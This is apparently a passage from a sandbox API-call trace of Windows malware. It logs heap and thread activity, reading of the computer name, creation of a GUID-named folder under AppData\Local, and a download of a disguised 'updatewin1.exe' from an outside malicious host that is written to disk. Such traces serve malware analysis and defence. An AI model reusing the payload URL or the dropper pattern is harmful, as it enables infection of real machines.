Size=0x860) returned 0x99b1530 [0075.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99a6230 [0075.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99a6ab8 [0075.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99b1d98 [0075.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99b25e0 [0075.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99a7340 [0075.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99a7bc8 [0075.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99a8450 [0075.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99a8cd8 [0075.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99a9560 [0075.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99a9de8 [0075.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99aa670 [0075.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99aaef8 [0075.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ab780 [0075.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ac008 [0075.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x99b2e28 [0075.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x99b3690 [0075.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ac890 [0075.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ad118 [0075.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ad9a0 [0075.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ae228 [0075.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99aeab0 [0075.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99af338 [0075.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99afbc0 [0075.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99b3f10 [0075.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99b4798 [0075.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99b5020 [0075.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99b58a8 [0075.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99b6130 [0075.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99b69b8 [0075.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99b7240 [0075.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x99c3ef8 [0075.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x99c4760 [0075.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99b7ac8 [0075.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99b8350 [0075.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99b8bd8 [0075.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99b9460 [0075.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99b9ce8 [0075.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ba570 [0075.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99badf8 [0075.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99bb680 [0075.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99bbf08 [0075.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99bc790 [0075.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99bd018 [0075.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99bd8a0 [0075.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99be128 [0075.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99be9b0 [0075.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x99c4fc8 [0075.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x99c5830 [0075.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99bf238 [0075.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99bfac0 [0075.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c0348 [0075.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c0bd0 [0075.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c1458 [0075.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c1ce0 [0075.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c2568 [0075.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c2df0 [0075.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c60b0 [0075.084] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x31491f0 [0075.084] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c6938 [0075.084] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x810) returned 0x320af68 [0075.084] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x810) returned 0x99d6098 [0075.084] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x810) returned 0x99d68b0 [0075.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x810) returned 0x99d70c8 [0075.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x810) returned 0x99d78e0 [0075.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x810) returned 0x99d80f8 [0075.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x810) returned 0x99c71c0 [0075.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316da48 [0075.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c7a48 [0075.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c82d0 [0075.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c8b58 [0075.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c93e0 [0075.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x110) returned 0x3170e68 [0075.085] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41f130, lpParameter=0x31f0450, dwCreationFlags=0x0, lpThreadId=0x31bb130 | out: lpThreadId=0x31bb130*=0x8c4) returned 0x690 [0075.086] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41fd80, lpParameter=0x529238, dwCreationFlags=0x0, lpThreadId=0x529230 | out: lpThreadId=0x529230*=0x8d4) returned 0x694 [0075.087] GetMessageW (lpMsg=0x18e110, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0) [0093.155] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x800) returned 0x31d1120 [0093.155] GetComputerNameW (in: lpBuffer=0x31d1120, nSize=0x18d48c | out: lpBuffer="XDUWTFONO", nSize=0x18d48c) returned 1 [0093.155] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.155] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d1120 | out: hHeap=0x680000) returned 1 [0093.155] IsWindow (hWnd=0x3027c) returned 1 [0093.155] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 Thread: id = 34 os_tid = 0x42c Thread: id = 35 os_tid = 0x808 Thread: id = 36 os_tid = 0x818 Thread: id = 37 os_tid = 0x828 Thread: id = 38 os_tid = 0x838 Thread: id = 39 os_tid = 0x848 Thread: id = 40 os_tid = 0x858 Thread: id = 41 os_tid = 0x868 Thread: id = 42 os_tid = 0x8a0 [0072.967] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x110) returned 0x3150248 [0072.967] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x110) returned 0x3149ab8 [0072.967] GetLastError () returned 0x54f [0072.967] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x3bc) returned 0x31818f8 [0072.967] GetCurrentThreadId () returned 0x8a0 [0072.967] SetLastError (dwErrCode=0x54f) [0072.967] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175870 [0072.967] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x6a5d28 [0072.967] GetLastError () returned 0x54f [0072.967] SetLastError (dwErrCode=0x54f) [0072.967] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31758b8 [0072.967] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f2f8 [0072.967] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a5d28 | out: hHeap=0x680000) returned 1 [0072.967] GetLastError () returned 0x54f [0072.968] SetLastError (dwErrCode=0x54f) [0072.968] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f368 [0072.968] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x48) returned 0x3183da0 [0072.968] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315f2f8 | out: hHeap=0x680000) returned 1 [0072.968] GetLastError () returned 0x54f [0072.968] SetLastError (dwErrCode=0x54f) [0072.968] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f2f8 [0072.968] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x7595f0 [0072.968] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3183da0 | out: hHeap=0x680000) returned 1 [0072.968] GetLastError () returned 0x54f [0072.968] SetLastError (dwErrCode=0x54f) [0072.968] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f170 [0072.968] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x3134ff0 [0072.968] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x7595f0 | out: hHeap=0x680000) returned 1 [0072.968] GetLastError () returned 0x54f [0072.968] SetLastError (dwErrCode=0x54f) [0072.968] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f100 [0072.968] GetLastError () returned 0x54f [0072.968] SetLastError (dwErrCode=0x54f) [0072.968] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3149ab8 | out: hHeap=0x680000) returned 1 [0072.968] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0072.969] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathA") returned 0x75787804 [0072.969] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x400) returned 0x3189d68 [0072.969] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x3189d68 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0072.969] UuidCreate (in: Uuid=0x998d768 | out: Uuid=0x998d768) returned 0x0 [0072.970] UuidToStringA (in: Uuid=0x998d768, StringUuid=0x998d6c0 | out: StringUuid=0x998d6c0) returned 0x0 [0072.970] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315efb0 [0072.970] RpcStringFreeA (in: String=0x998d6c0 | out: String=0x998d6c0) returned 0x0 [0072.970] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="57db73de-989a-4393-870b-10752e4771b8" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8") returned 1 [0072.970] CreateDirectoryA (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\57db73de-989a-4393-870b-10752e4771b8"), lpSecurityAttributes=0x0) returned 1 [0072.972] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x410) returned 0x318a170 [0072.972] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x410) returned 0x316eb50 [0072.972] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1000) returned 0x316ef68 [0072.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x316eb50, cbMultiByte=-1, lpWideCharStr=0x316ef68, cchWideChar=2048 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8") returned 81 [0072.972] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1010) returned 0x316ff70 [0072.972] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ef68 | out: hHeap=0x680000) returned 1 [0072.972] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316eb50 | out: hHeap=0x680000) returned 1 [0072.972] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x6a5d28 [0072.972] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0072.972] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175900 [0072.972] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x316eb50 [0072.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3175900, cbMultiByte=-1, lpWideCharStr=0x316eb50, cchWideChar=1072 | out: lpWideCharStr="http://ring2.ug/files/penelop/updatewin1.exe") returned 45 [0072.972] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x870) returned 0x316f3b8 [0072.972] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316eb50 | out: hHeap=0x680000) returned 1 [0072.972] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175900 | out: hHeap=0x680000) returned 1 [0072.980] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x870) returned 0x3170f88 [0072.980] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x316eb50 [0072.980] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://ring2.ug/files/penelop/updatewin1.exe", cchWideChar=-1, lpMultiByteStr=0x316eb50, cbMultiByte=2096, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://ring2.ug/files/penelop/updatewin1.exe", lpUsedDefaultChar=0x0) returned 45 [0072.980] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x3171800 [0072.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316eb50 | out: hHeap=0x680000) returned 1 [0072.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3170f88 | out: hHeap=0x680000) returned 1 [0072.980] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="http://ring2.ug/files/penelop/updatewin1.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0073.366] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3171800 | out: hHeap=0x680000) returned 1 [0073.366] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x998d6d0, lpdwBufferLength=0x998d710, lpdwIndex=0x0 | out: lpBuffer=0x998d6d0*, lpdwBufferLength=0x998d710*=0x4, lpdwIndex=0x0) returned 1 [0073.368] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175a68 [0073.368] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x319e258 [0073.368] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175a68 | out: hHeap=0x680000) returned 1 [0073.368] lstrcpyA (in: lpString1=0x3189d68, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8" [0073.368] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8", pMore="updatewin1.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin1.exe") returned 1 [0073.368] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x7596c0 [0073.368] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin1.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin1.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5e0 [0073.369] SetFilePointer (in: hFile=0x5e0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.369] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0073.371] WriteFile (in: hFile=0x5e0, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0073.372] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0073.405] WriteFile (in: hFile=0x5e0, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0073.405] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0073.406] WriteFile (in: hFile=0x5e0, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0073.406] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0073.407] WriteFile (in: hFile=0x5e0, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0073.407] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0073.445] WriteFile (in: hFile=0x5e0, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0073.445] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0073.446] WriteFile (in: hFile=0x5e0, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0073.446] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0073.447] WriteFile (in: hFile=0x5e0, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0073.447] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0073.448] WriteFile (in: hFile=0x5e0, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0073.448] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0073.448] WriteFile (in: hFile=0x5e0, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0073.449] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0073.479] WriteFile (in: hFile=0x5e0, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0073.479] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0073.488] WriteFile (in: hFile=0x5e0, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0073.488] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0073.489] WriteFile (in: hFile=0x5e0, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0073.489] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0073.489] WriteFile (in: hFile=0x5e0, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0073.490] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0073.490] WriteFile (in: hFile=0x5e0, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0073.490] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0073.491] WriteFile (in: hFile=0x5e0, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0073.491] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0073.491] WriteFile (in: hFile=0x5e0, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0073.492] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0073.525] WriteFile (in: hFile=0x5e0, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0073.526] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0073.530] WriteFile (in: hFile=0x5e0, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0073.530] InternetReadFile (in: 